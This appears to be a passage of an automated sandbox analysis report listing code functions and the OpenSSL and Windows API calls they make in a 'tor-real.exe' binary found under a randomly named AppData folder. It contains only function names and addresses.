Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C296CB0 CRYPTO_new_ex_data,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_free,CRYPTO_malloc,CRYPTO_THREAD_unlock,ERR_put_error,ERR_put_error,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,	25_2_6C296CB0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CEC80 CRYPTO_zalloc,memcpy,CRYPTO_clear_free,CRYPTO_secure_zalloc,CRYPTO_secure_clear_free,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C1CEC80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E6C80 EVP_CIPHER_CTX_key_length,EVP_PKEY_derive,EVP_CipherInit_ex,OPENSSL_cleanse,CRYPTO_free,EVP_CIPHER_CTX_reset,EVP_PKEY_CTX_free,EVP_CipherUpdate,CRYPTO_malloc,EVP_CipherUpdate,OPENSSL_cleanse,OPENSSL_cleanse,__stack_chk_fail,CMS_RecipientInfo_kari_get0_alg,ERR_put_error,	25_2_6C1E6C80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2ACC90 OPENSSL_hexstr2buf,strlen,CRYPTO_malloc,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,	25_2_6C2ACC90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F4CA0 i2o_SCT,memcpy,CRYPTO_malloc,memcpy,ERR_put_error,CRYPTO_free,ERR_put_error,__stack_chk_fail,	25_2_6C1F4CA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C30CCF0 UI_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,UI_get_default_method,CRYPTO_new_ex_data,UI_null,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_free,	25_2_6C30CCF0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C272CE0 CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C272CE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D6CD1 CRYPTO_free,BIO_snprintf,CRYPTO_free,BN_free,	25_2_6C1D6CD1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C202CF0 DH_meth_set1_name,CRYPTO_strdup,CRYPTO_free,ERR_put_error,	25_2_6C202CF0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ACCC3 CRYPTO_strndup,	25_2_6C1ACCC3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18ACF9 CRYPTO_malloc,memcpy,CRYPTO_free,	25_2_6C18ACF9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FACF0 DES_decrypt3,DES_encrypt2,DES_encrypt2,DES_encrypt2,	25_2_6C1FACF0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ACCE1 CRYPTO_strndup,CRYPTO_strndup,strlen,	25_2_6C1ACCE1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1EAD00 CMS_SignerInfo_verify,OBJ_obj2nid,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestVerifyInit,ASN1_item_i2d,EVP_DigestUpdate,CRYPTO_free,EVP_DigestVerifyFinal,ERR_put_error,ERR_put_error,EVP_MD_CTX_reset,EVP_MD_CTX_new,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,	25_2_6C1EAD00
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A4D34 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,	25_2_6C1A4D34
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D6D51 CRYPTO_free,BN_free,	25_2_6C1D6D51
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E2D50 CMAC_resume,EVP_EncryptInit_ex,	25_2_6C1E2D50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18ED43 CRYPTO_clear_free,CRYPTO_clear_free,	25_2_6C18ED43
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A4D47 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,	25_2_6C1A4D47
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1BAD6C CRYPTO_zalloc,BUF_MEM_new_ex,CRYPTO_zalloc,CRYPTO_free,BUF_MEM_free,CRYPTO_free,	25_2_6C1BAD6C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2D0DA0 RAND_DRBG_get0_private,CRYPTO_THREAD_run_once,CRYPTO_THREAD_get_local,RAND_DRBG_instantiate,CRYPTO_THREAD_set_local,CRYPTO_THREAD_lock_free,CRYPTO_free_ex_data,CRYPTO_secure_clear_free,CRYPTO_clear_free,	25_2_6C2D0DA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAD80 CRYPTO_THREAD_get_local,DeleteFiber,OPENSSL_sk_pop,CRYPTO_free,DeleteFiber,CRYPTO_free,OPENSSL_sk_pop,OPENSSL_sk_free,CRYPTO_free,CRYPTO_THREAD_set_local,CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,	25_2_6C1AAD80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18EDB8 CRYPTO_clear_free,CRYPTO_clear_free,ERR_put_error,	25_2_6C18EDB8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D0DBB CRYPTO_malloc,	25_2_6C1D0DBB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C28AD90 EVP_DecryptUpdate,EVP_CIPHER_CTX_test_flags,ERR_put_error,ERR_put_error,memcpy,memcpy,EVP_CIPHER_flags,ERR_put_error,OPENSSL_die,EVP_DecryptFinal,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,OPENSSL_die,EVP_DecryptFinal_ex,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,OPENSSL_die,	25_2_6C28AD90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C192DA0 ASN1_TIME_set_string_X509,strlen,ASN1_UTCTIME_check,ASN1_STRING_copy,CRYPTO_free,ASN1_GENERALIZEDTIME_check,CRYPTO_zalloc,memcpy,__stack_chk_fail,ASN1_TIME_to_tm,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_diff,time,OPENSSL_gmtime,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_print,BIO_printf,BIO_write,BIO_printf,__stack_chk_fail,ASN1_TIME_cmp_time_t,OPENSSL_gmtime,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_normalize,ASN1_STRING_set,time,OPENSSL_gmtime,ASN1_STRING_new,ASN1_STRING_set,BIO_snprintf,ASN1_STRING_set,ASN1_STRING_free,__stack_chk_fail,ASN1_TIME_compare,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TYPE_get,	25_2_6C192DA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B6DD0 ERR_put_error,BIO_clear_flags,BIO_clear_flags,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,__stack_chk_fail,ERR_put_error,	25_2_6C1B6DD0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DEDC0 CAST_ecb_encrypt,CAST_encrypt,	25_2_6C1DEDC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ECDC0 CMS_EncryptedData_encrypt,CMS_ContentInfo_new,CMS_EncryptedData_set1_key,CMS_dataInit,SMIME_crlf_copy,BIO_ctrl,CMS_dataFinal,BIO_free_all,CMS_set_detached,ERR_put_error,CMS_ContentInfo_free,ERR_put_error,ERR_put_error,BIO_free_all,	25_2_6C1ECDC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18EDF9 CRYPTO_clear_free,CRYPTO_clear_free,ERR_put_error,	25_2_6C18EDF9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C28CDC0 EVP_PBE_CipherInit,OBJ_obj2nid,OPENSSL_sk_find,OPENSSL_sk_value,strlen,OBJ_nid2sn,EVP_get_cipherbyname,OBJ_nid2sn,EVP_get_digestbyname,OBJ_bsearch_,ERR_put_error,i2t_ASN1_OBJECT,ERR_add_error_data,OPENSSL_strlcpy,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_PBE_alg_add_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,ERR_put_error,OPENSSL_sk_new,	25_2_6C28CDC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2AEDC0 OBJ_sn2nid,OPENSSL_LH_retrieve,strcmp,__stack_chk_fail,OBJ_txt2obj,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,OPENSSL_LH_retrieve,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C2AEDC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1BAE11 CRYPTO_free,	25_2_6C1BAE11
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C270E30 ENGINE_pkey_asn1_find_str,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,	25_2_6C270E30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C19CE00 i2a_ASN1_STRING,BIO_write,BIO_write,BIO_write,__stack_chk_fail,a2i_ASN1_STRING,BIO_gets,OPENSSL_hexchar2int,OPENSSL_hexchar2int,ERR_put_error,CRYPTO_free,BIO_gets,CRYPTO_realloc,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C19CE00
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1BAE39 BUF_MEM_free,CRYPTO_free,	25_2_6C1BAE39
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1C6E30 BN_BLINDING_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_THREAD_get_current_id,BN_dup,BN_dup,BN_dup,BN_get_flags,BN_set_flags,BN_free,BN_free,BN_free,BN_free,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,	25_2_6C1C6E30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C194E20 EVP_PKEY_asn1_add_alias,CRYPTO_zalloc,OPENSSL_sk_find,OPENSSL_sk_push,OPENSSL_sk_sort,	25_2_6C194E20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FAE20 DES_ncbc_encrypt,DES_encrypt1,DES_encrypt1,DES_encrypt1,	25_2_6C1FAE20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C190E40 ASN1_STRING_print_ex,ASN1_tag2str,strlen,BIO_write,__stack_chk_fail,ASN1_STRING_print_ex_fp,fwrite,fwrite,ASN1_tag2str,strlen,fwrite,fwrite,i2d_ASN1_TYPE,CRYPTO_malloc,i2d_ASN1_TYPE,fwrite,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,ASN1_STRING_to_UTF8,ASN1_mbstring_copy,__stack_chk_fail,	25_2_6C190E40
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DEE40 CAST_encrypt,	25_2_6C1DEE40
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C190E74 BIO_write,BIO_write,BIO_write,BIO_write,i2d_ASN1_TYPE,CRYPTO_malloc,i2d_ASN1_TYPE,BIO_write,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C190E74
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C192E67 ASN1_STRING_copy,CRYPTO_free,CRYPTO_zalloc,memcpy,	25_2_6C192E67
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAE90 ASYNC_cleanup_thread,OPENSSL_init_crypto,	25_2_6C1AAE90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2AEEA0 OBJ_txt2obj,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,__stack_chk_fail,OBJ_txt2nid,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,OBJ_obj2nid,ASN1_OBJECT_free,OPENSSL_LH_retrieve,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,	25_2_6C2AEEA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C19EEB0 ASN1_bn_print,BN_is_negative,BIO_indent,BN_is_zero,BN_num_bits,BIO_printf,BIO_printf,BN_num_bits,CRYPTO_malloc,BIO_printf,BN_bn2bin,ASN1_buf_print,CRYPTO_clear_free,	25_2_6C19EEB0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAED0 ASYNC_get_current_job,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,	25_2_6C1AAED0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1EEEE0 OPENSSL_LH_retrieve,__stack_chk_fail,OPENSSL_sk_push,OPENSSL_LH_insert,OPENSSL_sk_delete_ptr,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C1EEEE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C30CF20 UI_free,OPENSSL_sk_pop_free,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,	25_2_6C30CF20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A4F04 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,	25_2_6C1A4F04
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAF30 ASYNC_block_pause,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,	25_2_6C1AAF30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A4F5C OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,	25_2_6C1A4F5C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C196F50 ASN1_STRING_copy,memcpy,strlen,CRYPTO_realloc,ERR_put_error,ERR_put_error,	25_2_6C196F50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C296F60 CRYPTO_free_ex_data,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,CRYPTO_malloc,CRYPTO_THREAD_unlock,CRYPTO_THREAD_write_lock,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_free,ERR_put_error,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,	25_2_6C296F60
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAF57 CRYPTO_THREAD_get_local,	25_2_6C1AAF57
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C198F73 strlen,OPENSSL_sk_push,strlen,strlen,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,OPENSSL_sk_pop_free,	25_2_6C198F73
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C30CFA0 UI_add_input_string,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C30CFA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1C6F89 ERR_put_error,CRYPTO_free,	25_2_6C1C6F89
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C286FB0 EVP_ENCODE_CTX_free,CRYPTO_free,	25_2_6C286FB0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAF80 ASYNC_unblock_pause,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,	25_2_6C1AAF80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C286F80 EVP_ENCODE_CTX_new,CRYPTO_zalloc,	25_2_6C286F80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2AAF80 CRYPTO_ofb128_encrypt,	25_2_6C2AAF80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AAFA7 CRYPTO_THREAD_get_local,	25_2_6C1AAFA7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C230FE0 EC_POINT_new,CRYPTO_zalloc,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,	25_2_6C230FE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C29EFF0 CRYPTO_free,	25_2_6C29EFF0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E8FC0 CMS_add0_recipient_password,ERR_put_error,X509_ALGOR_new,EVP_CIPHER_CTX_new,EVP_EncryptInit_ex,EVP_CIPHER_CTX_iv_length,RAND_bytes,EVP_EncryptInit_ex,ASN1_TYPE_new,EVP_CIPHER_param_to_asn1,EVP_CIPHER_CTX_cipher,EVP_CIPHER_type,OBJ_nid2obj,EVP_CIPHER_CTX_free,ASN1_item_new,ASN1_item_new,X509_ALGOR_free,X509_ALGOR_new,OBJ_nid2obj,ASN1_TYPE_new,X509_ALGOR_it,ASN1_item_pack,X509_ALGOR_free,PKCS5_pbkdf2_set,strlen,OPENSSL_sk_push,ERR_put_error,EVP_CIPHER_CTX_free,ASN1_item_free,ERR_put_error,ERR_put_error,EVP_CIPHER_CTX_free,X509_ALGOR_free,ERR_put_error,ERR_put_error,EVP_CIPHER_CTX_free,__stack_chk_fail,	25_2_6C1E8FC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1C6FE0 BN_BLINDING_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_THREAD_lock_free,CRYPTO_free,	25_2_6C1C6FE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E4FE0 CMS_RecipientInfo_decrypt,ERR_put_error,OBJ_obj2nid,AES_set_decrypt_key,CRYPTO_malloc,AES_unwrap_key,OPENSSL_cleanse,EVP_PKEY_CTX_new,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_free,CRYPTO_free,ERR_put_error,OBJ_obj2nid,OBJ_nid2sn,EVP_get_cipherbyname,EVP_CIPHER_key_length,EVP_PKEY_CTX_ctrl,EVP_PKEY_decrypt,CRYPTO_malloc,EVP_PKEY_decrypt,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,EVP_PKEY_CTX_free,ERR_put_error,ERR_put_error,__stack_chk_fail,	25_2_6C1E4FE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C182FE7 AES_decrypt,	25_2_6C182FE7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B281B CRYPTO_free,	25_2_6C1B281B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C304820 CRYPTO_THREAD_lock_new,CRYPTO_zalloc,InitializeCriticalSectionAndSpinCount,CRYPTO_free,	25_2_6C304820
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1A4808 ASN1_item_ex_i2d,CRYPTO_malloc,ASN1_item_ex_i2d,	25_2_6C1A4808
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AA834 ERR_put_error,CRYPTO_free,	25_2_6C1AA834
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F8830 DES_cfb64_encrypt,DES_encrypt1,DES_encrypt1,__stack_chk_fail,DES_cfb_encrypt,DES_encrypt1,DES_encrypt1,__stack_chk_fail,	25_2_6C1F8830
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18E828 ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,CRYPTO_malloc,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestInit_ex,EVP_DigestUpdate,ERR_put_error,EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,	25_2_6C18E828
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C194856 CRYPTO_clear_free,EVP_MD_CTX_free,ERR_put_error,	25_2_6C194856
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18E879 EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,EVP_SignFinal,CRYPTO_free,	25_2_6C18E879
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C32A840 OPENSSL_sk_free,OPENSSL_sk_pop_free,X509_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,X509_policy_tree_free,	25_2_6C32A840
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1B2868 CRYPTO_zalloc,ERR_put_error,	25_2_6C1B2868
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D0860 BN_GENCB_free,CRYPTO_free,	25_2_6C1D0860
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C3048B0 CRYPTO_THREAD_write_lock,EnterCriticalSection,	25_2_6C3048B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C198890 CRYPTO_strdup,CRYPTO_strdup,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C198890
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AA890 ASYNC_start_job,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,CRYPTO_THREAD_get_local,OPENSSL_sk_pop,CRYPTO_malloc,memcpy,SwitchToFiber,SwitchToFiber,CRYPTO_malloc,CRYPTO_THREAD_set_local,CRYPTO_free,ASYNC_init_thread,CRYPTO_THREAD_get_local,CRYPTO_zalloc,ERR_put_error,CreateFiber,CRYPTO_free,DeleteFiber,CRYPTO_free,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,ERR_put_error,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,	25_2_6C1AA890
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2AE8B0 OBJ_obj2txt,BN_set_word,BN_lshift,BN_free,BN_add_word,BIO_snprintf,strlen,BN_new,OBJ_obj2nid,BN_bn2dec,strlen,OPENSSL_strlcpy,CRYPTO_free,OBJ_nid2ln,OPENSSL_strlcpy,strlen,OPENSSL_strlcpy,OBJ_nid2sn,BN_sub_word,BN_free,__stack_chk_fail,	25_2_6C2AE8B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F4880 o2i_SCT,SCT_new,CRYPTO_memdup,SCT_free,ERR_put_error,SCT_free,CRYPTO_memdup,CRYPTO_memdup,ERR_put_error,SCT_free,__stack_chk_fail,	25_2_6C1F4880
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C304890 CRYPTO_THREAD_read_lock,EnterCriticalSection,	25_2_6C304890
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1948B3 CRYPTO_clear_free,EVP_MD_CTX_free,ERR_put_error,	25_2_6C1948B3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C3048F0 CRYPTO_THREAD_lock_free,DeleteCriticalSection,CRYPTO_free,	25_2_6C3048F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1AA8C3 CRYPTO_THREAD_get_local,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,	25_2_6C1AA8C3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D68C0 BN_bn2hex,BN_is_zero,CRYPTO_malloc,CRYPTO_strdup,ERR_put_error,	25_2_6C1D68C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C3048D0 CRYPTO_THREAD_unlock,LeaveCriticalSection,	25_2_6C3048D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18A8F0 ASN1_STRING_set,ASN1_INTEGER_new,ASN1_STRING_set,ERR_put_error,ASN1_INTEGER_free,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,d2i_ASN1_UINTEGER,ASN1_get_object,ERR_put_error,ASN1_INTEGER_free,ASN1_INTEGER_new,ASN1_get_object,ERR_put_error,ERR_put_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,ASN1_INTEGER_get_int64,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C18A8F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F28F0 CONF_get1_default_config_file,CRYPTO_strdup,X509_get_default_cert_area,strlen,CRYPTO_malloc,X509_get_default_cert_area,BIO_snprintf,	25_2_6C1F28F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C304930 CRYPTO_THREAD_run_once,	25_2_6C304930
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D091C CRYPTO_zalloc,memcpy,CRYPTO_clear_free,	25_2_6C1D091C
